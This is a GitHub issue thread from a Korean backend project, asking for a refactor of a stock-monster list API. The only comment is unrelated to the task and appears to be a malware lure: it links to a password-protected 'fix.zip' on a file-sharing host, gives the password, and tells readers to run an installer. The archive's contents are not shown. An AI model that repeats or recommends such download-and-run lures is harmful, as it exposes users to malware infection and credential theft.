### ISSUE TITLE
스톡몬 목록 조회 API 리팩토링 

### ISSUE THREAD

**Issue by sdc05103** [StockmonGo/BE#10]
## ✅ 해야 할 작업을 TASK 별로 작성해주세요.
- [ ] 스톡몬 목록 조회 API 리팩토링

<br><br>

**Comment by llowvxe** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."
